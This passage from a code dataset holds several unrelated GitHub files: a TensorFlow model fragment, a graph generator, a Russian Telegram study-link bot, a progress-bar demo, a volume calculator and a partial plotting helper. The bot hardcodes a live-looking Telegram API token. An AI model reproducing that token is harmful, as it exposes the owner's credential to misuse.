tf.reduce_sum(\n                tf.nn.sigmoid_cross_entropy_with_logits(labels=self.y, logits=self.row_prediction))\n            reg_term = self._build_regular_term()\n            loss = cross_entropy + reg_term\n\n            return loss\n\n    # build the training op\n    def build_train_op(self):\n        with self.graph.as_default():\n            train_op = tf.train.AdamOptimizer(beta2=0.9999).minimize(self.loss)\n\n            return train_op\n\n    # get the single-label prediction for the fitted data\n    def get_one_result(self):\n        with self.graph.as_default():\n            soft_max = tf.nn.softmax(self.row_prediction)\n            result = tf.argmax(soft_max, 1)\n\n            return result\n\n    # single-label accuracy\n    def one_result_accuracy(self):\n        with self.graph.as_default():\n            soft_max = tf.nn.softmax(self.row_prediction)\n            correct_prediction = tf.equal(tf.argmax(soft_max, 1), tf.argmax(self.y, 1))\n            accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n            return accuracy\n\n    def get_multi_result(self):\n        with self.graph.as_default():\n            soft_max = tf.nn.softmax(self.row_prediction)\n            # value -> the top-k probabilities\n            # index -> the top-k indices\n            # e.g. [1,5,2,4,6] top 2 : value -> [6, 5] index -> [4,1]\n            value, index = tf.nn.top_k(soft_max, k=self.multi_label_count)\n\n            return value, index\n\n    @property\n    def graph(self):\n        return self._graph\n\n    @property\n    def x(self):\n        return self._x\n\n    @property\n    def y(self):\n        return self._y\n\n    @property\n    def keep_prob(self):\n        return self._keep_prob\n\n    @property\n    def train_op(self):\n        return self._train_op\n\n    @property\n    def output_size(self):\n        return self._output_size\n","repo_name":"TsNFs/SecretProject","sub_path":"nn/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13636220944","text":"#Creates a fabricated graph of size n which follows linearly from the first node all the way to the nth node in a single path\n\n#Check to see shape of fitness vs. eigenvector centrality plot.\n\nimport sys\n\nbase = int(sys.argv[1])\nnum_nodes = 2**base\n\nfor i in range(0,num_nodes-1):\n    print(str(i) + \";\" + str(i+1))\nprint(str(num_nodes-1) + \";\" + str(num_nodes-1))\n\n","repo_name":"thomasgreen79/Landscape_Vis","sub_path":"Binary_Hypergraphs/special_cases/make_direct_path_graph.py","file_name":"make_direct_path_graph.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37837838980","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport telebot\n\n\nbot = telebot.TeleBot(\"5863278624:AAFW5zXpffCSA9qSpAhVUMf0TG3Huq3o4iM\")\n\n\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n    mess = f\"Привет,{message.from_user.first_name} {message.from_user.last_name} \\n\" \\\n           f\"Я помощник по твоему обучению я.п. Python. И мой создатель развивает меня в этом направлении.\"\n    bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n    mess = f\"Привет,{message.from_user.first_name} \" \\\n           f\"На данный момент я знаю, что такое: \" \\\n           f\"\\n if-elif-else\\n While \\n break \\n continue \\n Range\\n For \\n Вложенные циклы \\n\" \\\n           f\"Словари\\n Кортежи\\n Списки\\n Строки\\n Множества\\n Типы данных\\n Работа с файлами\\n Исключения\\n\" \\\n           f\"def(функции)\\n Рекурсия\\n *args\\n **kwargs\\n enumerate() \\n List comprehension\\n lambda функции\\n map \" \\\n           f\"\\n Замыкания\\n Декораторы \\n Модули и пакеты \\n Виртуальные окружения \\n Установка пакетов в python\\n\" \\\n           f\"JSON данные \\n CLI \\n Переменные окружения \\n Pathlib \\n Работа с SQlite3 в Python \\n pep8 \\n Срезы \\n \" \\\n           f\"Я помогу тебе. Для этого введи одно из вышеперечисленных слов или словосочетаний. И я вышлю \" \\\n           f\"вспомогательный материал. \"\n    bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help2\"])\ndef help2(message):\n    mess = f\"Привет,{message.from_user.first_name}\\n\" \\\n           f\"У меня есть ещё пара команд: Методички, Задания, Методичка (её номер) \"\n    bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler()\ndef get_user_text(message):\n    if message.text == \"Hello\" or message.text == \"Привет\":\n        bot.send_message(message.chat.id, \"И тебе привет!\", parse_mode=\"html\")\n    elif message.text == \"Отдохнуть бы!\":\n        bot.send_message(message.chat.id, f\"Послушай и отдохни\\n\", parse_mode=\"html\")\n        bot.send_audio(message.chat.id, open(r\"c:/Users/admin/downloads/Nirvana.mp3\", \"rb\"))\n    elif message.text == \"id\":\n        bot.send_message(message.chat.id, f\"Твой ID: {message.from_user.id}\", parse_mode=\"html\")\n    elif message.text == \"Срезы\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: https://habr.com/ru/post/587282/ \\n \"\n                         \"Ещё ссылка: https://proproprogs.ru/python_base/spiski-srezy-i-metody \\n \", parse_mode=\"html\")\n    elif message.text == \"pep8\" or message.text == \"Pep8\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html\"\n                         \" \\n Ссылка на видео: https://www.youtube.com/watch?v=pAJO25vJneQ \\n \"\n                         \"Ещё видео: https://www.youtube.com/watch?v=qBSYKHXVgf0 \", parse_mode=\"html\")\n    elif message.text == \"Работа с SQlite3 в Python\" or message.text == \"SQlite3\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=K1C5JAo7cMU \\n \"\n                         \"Часть 2: https://www.youtube.com/watch?v=gm0p517EG7o \\n \"\n                         \"Ещё видео: https://www.youtube.com/watch?v=fs7xrH2975U \", parse_mode=\"html\")\n    elif message.text == \"Pathlib\" or message.text == \"pathlib\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=wZvk8nyPQCY \\n \"\n                         \"Ещё видео: https://www.youtube.com/watch?v=DOgjN7RmHds\", parse_mode=\"html\")\n    elif message.text == \"Переменные окружения\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: https://lumpics.ru/environment-variables-in-windows-10/ \\n \"\n                         \"Ссылка на видео: https://www.youtube.com/watch?v=L9-I4NibguY \\n \", parse_mode=\"html\")\n    elif message.text == \"CLI\" or message.text == \"Интерфейс командной строки\":\n        bot.send_message(message.chat.id,\n                         \"Изучай: 
И мой создатель развивает меня в этом направлении.\"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help\"])\ndef help(message):\n mess = f\"Привет,{message.from_user.first_name} \" \\\n f\"На данный момент я знаю, что такое: \" \\\n f\"\\n if-elif-else\\n While \\n break \\n continue \\n Range\\n For \\n Вложенные циклы \\n\" \\\n f\"Словари\\n Кортежи\\n Списки\\n Строки\\n Множества\\n Типы данных\\n Работа с файлами\\n Исключения\\n\" \\\n f\"def(функции)\\n Рекурсия\\n *args\\n **kwargs\\n enumerate() \\n List comprehension\\n lambda функции\\n map \" \\\n f\"\\n Замыкания\\n Декораторы \\n Модули и пакеты \\n Виртуальные окружения \\n Установка пакетов в python\\n\" \\\n f\"JSON данные \\n CLI \\n Переменные окружения \\n Pathlib \\n Работа с SQlite3 в Python \\n pep8 \\n Срезы \\n \" \\\n f\"Я помогу тебе. Для этого введи одно из вышеперечисленных слов или словосочетаний. И я вышлю \" \\\n f\"вспомогательный материал. \"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler(commands=[\"help2\"])\ndef help2(message):\n mess = f\"Привет,{message.from_user.first_name}\\n\" \\\n f\"У меня есть ещё пара команд: Методички, Задания, Методичка (её номер) \"\n bot.send_message(message.chat.id, mess, parse_mode=\"html\")\n\n\n@bot.message_handler()\ndef get_user_text(message):\n if message.text == \"Hello\" or message.text == \"Привет\":\n bot.send_message(message.chat.id, \"И тебе привет!\", parse_mode=\"html\")\n elif message.text == \"Отдохнуть бы!\":\n bot.send_message(message.chat.id, f\"Послушай и отдохни\\n\", parse_mode=\"html\")\n bot.send_audio(message.chat.id, open(r\"c:/Users/admin/downloads/Nirvana.mp3\", \"rb\"))\n elif message.text == \"id\":\n bot.send_message(message.chat.id, f\"Твой ID: {message.from_user.id}\", parse_mode=\"html\")\n elif message.text == \"Срезы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://habr.com/ru/post/587282/ \\n \"\n \"Ещё ссылка: https://proproprogs.ru/python_base/spiski-srezy-i-metody \\n \", parse_mode=\"html\")\n elif message.text == \"pep8\" or message.text == \"Pep8\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html\"\n \" \\n Ссылка на видео: https://www.youtube.com/watch?v=pAJO25vJneQ \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=qBSYKHXVgf0 \", parse_mode=\"html\")\n elif message.text == \"Работа с SQlite3 в Python\" or message.text == \"SQlite3\":\n bot.send_message(message.chat.id,\n \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=K1C5JAo7cMU \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=gm0p517EG7o \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=fs7xrH2975U \", parse_mode=\"html\")\n elif message.text == \"Pathlib\" or message.text == \"pathlib\":\n bot.send_message(message.chat.id,\n \"Изучай: https://python-scripts.com/pathlib \\n Ссылка на видео: https://www.youtube.com/watch?v=wZvk8nyPQCY \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=DOgjN7RmHds\", parse_mode=\"html\")\n elif message.text == \"Переменные окружения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://lumpics.ru/environment-variables-in-windows-10/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=L9-I4NibguY \\n \", parse_mode=\"html\")\n elif message.text == \"CLI\" or message.text == \"Интерфейс командной строки\":\n bot.send_message(message.chat.id,\n \"Изучай: 
https://tproger.ru/translations/python-command-line-tools-with-click/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=vm9tOamPkeQ \\n \", parse_mode=\"html\")\n elif message.text == \"JSON данные\" or message.text == \"JSON\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dvmn.org/encyclopedia/modules/json/ \\n Ссылка на видео: https://www.youtube.com/watch?v=rIhygmw9HZM \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=3xaN1tDdkF4\", parse_mode=\"html\")\n elif message.text == \"Установка пакетов в Python\" or message.text == \"Виртуальные окружения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://habr.com/ru/post/491916/ \\n Ссылка на видео: https://www.youtube.com/watch?v=xSsKtIiUaOY \\n \"\n \"Ещё видео: https://www.youtube.com/watch?v=rsG1Y5k-9jo\", parse_mode=\"html\")\n elif message.text == \"Декораторы\" or message.text == \"Wraps\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dev-gang.ru/article/ljambdafunkcija-v-python-fe2p8vf789/ \\n Ссылка на видео: https://www.youtube.com/watch?v=Va-ovLxHmus \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=tj8EiBK8TeA\", parse_mode=\"html\")\n elif message.text == \"Модули и пакеты\" or message.text == \" __init__\":\n bot.send_message(message.chat.id,\n \"Изучай: https://devpractice.ru/python-lesson-13-modules-and-packages/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=VCRxOdCueqM \", parse_mode=\"html\")\n elif message.text == \"Замыкания\" or message.text == \"Closure\":\n bot.send_message(message.chat.id,\n \"Изучай: https://advpyneng.readthedocs.io/ru/latest/book/07_closure/closure.html \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=lA979PBb0TY \", parse_mode=\"html\")\n elif message.text == \"Функция map\" or message.text == \"map\":\n bot.send_message(message.chat.id,\n \"Изучай: https://egoroffartem.pythonanywhere.com/course/python/funktsiya-map-python \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=2ghKShXWuSs \", parse_mode=\"html\")\n elif message.text == \"lambda\" or message.text == \"lambda функции\":\n bot.send_message(message.chat.id,\n \"Изучай: https://dev-gang.ru/article/ljambdafunkcija-v-python-fe2p8vf789/ \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=8fzrm1tX5lI \", parse_mode=\"html\")\n elif message.text == \"List comprehension\" or message.text == \"Списковые включения\":\n bot.send_message(message.chat.id,\n \"Изучай: https://egoroffartem.pythonanywhere.com/course/python/generatori-spiskov-python-list-comprehension \\n Ссылка на видео: https://www.youtube.com/watch?v=_zBTBr6XdZo \\n\"\n \"Часть 2: https://www.youtube.com/watch?v=_RA35zG-0gA \\n \"\n \"Часть 3: https://www.youtube.com/watch?v=vn6bV6BYm7w\", parse_mode=\"html\")\n elif message.text == \"enumerate()\" or message.text == \"enumerate\":\n bot.send_message(message.chat.id,\n \"Изучай: https://proproprogs.ru/python_base/funkciya-enumerate-primery-ispolzovaniya \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=Hz1lDs69cCs \", parse_mode=\"html\")\n elif message.text == \"*args\" or message.text == \"**kwargs\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pavel-karateev.gitbook.io/intermediate-python/sintaksis/args_and_kwargs \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=mcAB5dBXMp4 \", parse_mode=\"html\")\n elif message.text == \"Рекурсия\" or message.text == \"рекурсивные вызовы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythontutor.ru/lessons/functions/ \\n \"\n \"Ссылка на видео: 
https://www.youtube.com/watch?v=jvFULnNpNLg \\n\"\n \"Часть 2: https://www.youtube.com/watch?v=rzGCxtZdMuM \", parse_mode=\"html\")\n elif message.text == \"def(функции)\" or message.text == \"def\" or message.text == \"Функции\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/vse-o-funkciyax-i-ix-argumentax.html \\n \"\n \"Ссылка на видео: https://www.youtube.com/watch?v=DJAlfolEv9A\", parse_mode=\"html\")\n elif message.text == \"if-elif-else\" or message.text == \"проверка истинности\" or message.text == \"if/else\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/osnovy/instrukciya-if-elif-else-proverka-istinnosti-trexmestnoe-vyrazhenie-ifelse.html\"\n \"\\n Ссылка на видео: https://www.youtube.com/watch?v=EggJRTzid1M\\n \"\n \"Часть 2: https://www.youtube.com/watch?v=8YshxYHIeeI \\n \"\n \"Часть 3: https://www.youtube.com/watch?v=8F-EfhsKHCI\", parse_mode=\"html\")\n elif message.text == \"While\" or message.text == \"break\" or message.text == \"continue\":\n bot.send_message(message.chat.id,\n \"Изучай: https://www.youtube.com/watch?v=Ll3AN1FXXfE \\n \"\n \"Часть 2: https://www.youtube.com/watch?v=Myh7OdxoYsA\", parse_mode=\"html\")\n elif message.text == \"Range\" or message.text == \"Функция range\":\n bot.send_message(message.chat.id, \"Ссылка на видео: https://www.youtube.com/watch?v=9J0fvF4k4F4\",\n parse_mode=\"html\")\n elif message.text == \"Вложенные циклы Python\":\n bot.send_message(message.chat.id, \"Ссылка на видео: https://www.youtube.com/watch?v=tsVgSwSdsa8\",\n parse_mode=\"html\")\n elif message.text == \"For\" or message.text == \"Цикл for\":\n bot.send_message(message.chat.id, \"Изучай: https://www.youtube.com/watch?v=iopPsTT7Pes\", parse_mode=\"html\")\n elif message.text == \"Кортежи\" or message.text == \"кортежи\" or message.text == \"кортеж\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/kortezhi-tuple.html\" \"Ссылка на видео:\",\n parse_mode=\"html\")\n elif message.text == \"Словари\" or message.text == \"Словарь\" or message.text == \"словарь\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/slovari-dict-funkcii-i-metody-slovarej.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=7_Zrh1--d5o\", parse_mode=\"html\")\n elif message.text == \"Лист\" or message.text == \"Список\" or message.text == \"Списки\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/spiski-list-funkcii-i-metody-spiskov.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=CEQZYZMPJSU\", parse_mode=\"html\")\n elif message.text == \"Строки\" or message.text == \"Функции и методы строк\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/stroki-funkcii-i-metody-strok.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=GmMD6gQYWe4\", parse_mode=\"html\")\n elif message.text == \"Множества\" or message.text == \"set\" or message.text == \"frozenset\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/mnozhestva-set-i-frozenset.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=KMGRXDxUw18\", parse_mode=\"html\")\n elif message.text == \"Типы данных\" or message.text == \"Тип данных питон\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/chisla-int-float-complex.html \\n\" \n \"Ссылка на видео: 
https://www.youtube.com/watch?v=DZvNZ9l9NT4\", parse_mode=\"html\")\n elif message.text == \"Работа с файлами\" or message.text == \"файлы\" or message.text == \"Файлы\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/fajly-rabota-s-fajlami.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=oRr_bEXJbV0\", parse_mode=\"html\")\n elif message.text == \"Исключения\" or message.text == \"try\" or message.text == \"expect\":\n bot.send_message(message.chat.id,\n \"Изучай: https://pythonworld.ru/tipy-dannyx-v-python/isklyucheniya-v-python-konstrukciya-try-except-dlya-obrabotki-isklyuchenij.html \\n\" \n \"Ссылка на видео: https://www.youtube.com/watch?v=qjqbek5tG3A\", parse_mode=\"html\")\n elif message.text == \"Я Виталий Горшков\" or message.text == \"я Горшков\" or message.text == \"Я Горшков\":\n bot.send_message(message.chat.id, \"ВИТАЛИК, ИДИ БЫСТРО УЧИСЬ И НЕ ЛЕНИСЬ!\", parse_mode=\"html\")\n elif message.text == \"Методичка 15\" or message.text == \"Задание 15\" or message.text == \"Методичка 2.20\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.20 (15).pdf\", \"rb\"), )\n elif message.text == \"Методичка 14\" or message.text == \"Задание 14\" or message.text == \"Методичка 2.19\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.19 (14).pdf\", \"rb\"))\n elif message.text == \"Методичка 13\" or message.text == \"Задание 13\" or message.text == \"Методичка 2.18\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.18 (13).pdf\", \"rb\"))\n elif message.text == \"Методичка 12\" or message.text == \"Задание 12\" or message.text == \"Методичка 2.17\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.17 (12).pdf\", \"rb\"))\n elif message.text == \"Методичка 11\" or message.text == \"Задание 11\" or message.text == \"Методичка 2.16\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.16 (11).pdf\", \"rb\"))\n elif message.text == \"Методичка 10\" or message.text == \"Задание 10\" or message.text == \"Методичка 2.15\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.15 (10).pdf\", \"rb\"))\n elif message.text == \"Методичка 9\" or message.text == \"Задание 9\" or message.text == \"Методичка 2.14\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.14 (9).pdf\", \"rb\"))\n elif message.text == \"Методичка 8\" or message.text == \"Задание 8\" or message.text == \"Методичка 2.13\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.13 (8).pdf\", \"rb\"))\n elif message.text == \"Методичка 7\" or message.text == \"Задание 7\" or message.text == \"Методичка 2.12\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.12 (7).pdf\", \"rb\"))\n elif message.text == \"Методичка 6\" or message.text == \"Задание 6\" or message.text == \"Методичка 2.11\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.11 (6).pdf\", \"rb\"))\n elif message.text == \"Методичка 5\" or message.text == \"Задание 5\" or message.text == \"Методичка 2.10\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.10 (5).pdf\", \"rb\"))\n elif message.text == \"Методичка 4\" or message.text == \"Задание 4\" or message.text == \"Методичка 2.9\":\n bot.send_document(message.chat.id, 
document=open(\"c:/Users/admin/downloads/labs/2.9 (4).pdf\", \"rb\"))\n elif message.text == \"Методичка 3\" or message.text == \"Задание 3\" or message.text == \"Методичка 2.8\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.8 (3).pdf\", \"rb\"))\n elif message.text == \"Методичка 2\" or message.text == \"Задание 2\" or message.text == \"Методичка 2.7\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.7 (2).pdf\", \"rb\"))\n elif message.text == \"Методичка 1\" or message.text == \"Задание 1\" or message.text == \"Методичка 2.6\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.6 (1).pdf\", \"rb\"))\n elif message.text == \"Методички\" or message.text == \"Задания\":\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.20 (15).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.19 (14).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.18 (13).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.17 (12).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.16 (11).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.15 (10).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.14 (9).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.13 (8).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.12 (7).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.11 (6).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.10 (5).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.9 (4).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.8 (3).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.7 (2).pdf\", \"rb\"))\n bot.send_document(message.chat.id, document=open(\"c:/Users/admin/downloads/labs/2.6 (1).pdf\", \"rb\"))\n\n else:\n bot.send_message(message.chat.id,\n \"Извини, я тебя не понимаю. 
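# --- editor's note: a hedged refactoring sketch, not part of the original bot: the
# --- elif chains above (study links and numbered handouts alike) can be collapsed
# --- into lookup tables; the entries and helper below are illustrative only.
TOPIC_LINKS = {
    "Срезы": "Изучай: https://habr.com/ru/post/587282/",
    "pep8": "Изучай: https://pythonworld.ru/osnovy/pep-8-rukovodstvo-po-napisaniyu-koda-na-python.html",
}

def handout_path(n):
    # handout N lives at "2.<N+5> (N).pdf", e.g. 1 -> 2.6 (1).pdf, 15 -> 2.20 (15).pdf
    return f"c:/Users/admin/downloads/labs/2.{n + 5} ({n}).pdf"

# the handler body then shrinks to a lookup instead of dozens of elif branches:
# reply = TOPIC_LINKS.get(message.text)
# if reply:
#     bot.send_message(message.chat.id, reply, parse_mode="html")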
Напиши, пожалуйста, /help или /help2, для отображения моего \"\n \"функционала.\",\n parse_mode=\"html\")\n\n\nbot.polling(none_stop=True)\n","repo_name":"ItsMyLife1337/ForPetProject","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":20630,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12464104547","text":"from tqdm import tqdm_gui\nfrom tqdm import tqdm\nimport time\nimport sys\n\ntoolbar_width = 40\n\n# setup toolbar\nsys.stdout.write(\"[%s]\" % (\" \" * toolbar_width))\nsys.stdout.flush()\nsys.stdout.write(\"\\b\" * (toolbar_width+1)) # return to start of line, after '['\n\nfor i in range(toolbar_width):\n time.sleep(0.1) # do real work here\n # update the bar\n sys.stdout.write(\"#\")\n sys.stdout.flush()\n\nsys.stdout.write(\"]\\n\")\n\n\nmyList = ['aaa', 'bbb', 'ccc', 'ddd', 'eee']\n\nfor i in tqdm(myList):\n time.sleep(2)\n print(i)\n","repo_name":"peterfarouk01/P1N1","sub_path":"progress_bar.py","file_name":"progress_bar.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33759099498","text":"# Sets the language to Portuguese\n# -*- coding: utf-8 -*-\n\n# using python modules\nimport os\nimport sys\nimport time\n\n# clear the screen\nos.system('cls')\nprint('\\n')\n\n# variables and constants\nVl = 0\nC = 0\nL = 0\nH = 0\n\n\n# reading input\nC = float(input('Digite o comprimento: '))\nL = float(input('Digite a largura: '))\nH = float(input('Digite a altura: '))\n\n\n# calculations\nVl = C * L * H\n\n# displaying results on screen\nprint('O volume é: ', Vl )\nprint('\\n') # skips a line\ntime.sleep(5) # 5 second pause\nsys.exit() # end-of-program command\n","repo_name":"RobertLeone/task-algoritmos","sub_path":"Aval01-Comprimento.py","file_name":"Aval01-Comprimento.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18553452344","text":"\"\"\"plot.py: Utility builder class for ML plots.\nUses scikit-learn code samples and framework\n\"\"\"\n__author__ = \"Mihai Matei\"\n__license__ = \"BSD\"\n__email__ = \"mihai.matei@my.fmi.unibuc.ro\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport randomcolor\nimport math\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\nfrom .image import Image\n\n\nclass PlotBuilder:\n def __init__(self):\n self.__figures = []\n self._subplot_idx = None\n self._subplot_size = [1, 1]\n self._current_subplot = None\n self._next_plot = True\n\n def show(self, close=True):\n plt.show()\n if close:\n self.close()\n\n def close(self):\n for fig in self.__figures:\n plt.close(fig)\n self.__figures = []\n self._subplot_idx = None\n self._subplot_size = [1, 1]\n\n def same(self):\n self._next_plot = False\n\n return self\n\n @staticmethod\n def get_plot():\n return plt\n\n def create_subplots(self, rows, cols, fig_size=(18, 18)):\n self.__figures.append(plt.figure(figsize=fig_size))\n self._subplot_idx = 0\n self._subplot_size = [rows, cols]\n\n return self\n\n def _get_next_plot(self, **kwargs):\n if not self._next_plot:\n self._next_plot = True # reset so that only the next call reuses the current subplot\n return self._current_subplot\n\n if self._subplot_idx is not None and self._subplot_idx >= (self._subplot_size[0] * self._subplot_size[1]):\n self._subplot_idx = None\n self._subplot_size 
= [1, 1]\n\n if self._subplot_idx is None:\n self.__figures.append(plt.figure(**kwargs))\n self._current_subplot = self.__figures[-1].add_subplot(1, 1, 1)\n return self._current_subplot\n\n self._subplot_idx += 1\n self._current_subplot = self.__figures[-1].add_subplot(*self._subplot_size, self._subplot_idx, **kwargs)\n return self._current_subplot\n\n def create_plot(self, title, x_data, *args):\n \"\"\"\n Plot a series of graphs on X axis points given by x_data\n and Y axis by tuples of (y_values, y_title) in args\n \"\"\"\n sp = self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n limits = [[100000, -100000], [100000, -100000], [100000, -100000]]\n\n x_values, x_label = x_data\n limits[0][0] = min(limits[0][0], min(x_values))\n limits[0][1] = max(limits[0][1], max(x_values))\n\n for data in args:\n color = rand_color.generate()[0]\n if isinstance(data, list):\n i = 0\n for y_values in data:\n i += 1\n limits[1][0] = min(limits[1][0], min(y_values))\n limits[1][1] = max(limits[1][1], max(y_values))\n sp.plot(x_values, y_values, color=color, linewidth=2,\n linestyle='--' if i % 2 else '-')\n else:\n y_values, y_title = data\n limits[1][0] = min(limits[1][0], min(y_values))\n limits[1][1] = max(limits[1][1], max(y_values))\n sp.plot(x_values, y_values, label=y_title, color=color, linewidth=2, linestyle='-')\n\n sp.set_xlim(limits[0])\n sp.set_xlabel(x_label)\n sp.set_ylim(limits[1])\n sp.legend(loc='upper right')\n sp.set_title(title)\n\n return self\n\n def create_horizontal_line(self, *args, **kwargs):\n sp = self._get_next_plot()\n\n rand_color = randomcolor.RandomColor()\n y_limits = list(sp.get_ylim())\n for data in args:\n y_value, y_title = data\n y_limits[0] = min(y_limits[0], y_value)\n y_limits[1] = max(y_limits[1], y_value)\n sp.plot(sp.get_xlim(), [y_value, y_value], label=y_title, color=rand_color.generate()[0], **kwargs)\n sp.set_ylim([y_limits[0] * 0.9, y_limits[1] * 1.1])\n sp.legend(loc='upper right')\n\n return self\n\n def create_scatter_plot(self, title, axis_labels, *args):\n \"\"\"\n Plot a series of graphs of scatter points given by the\n list of tuples (x, y, data_label)\n \"\"\"\n markers = 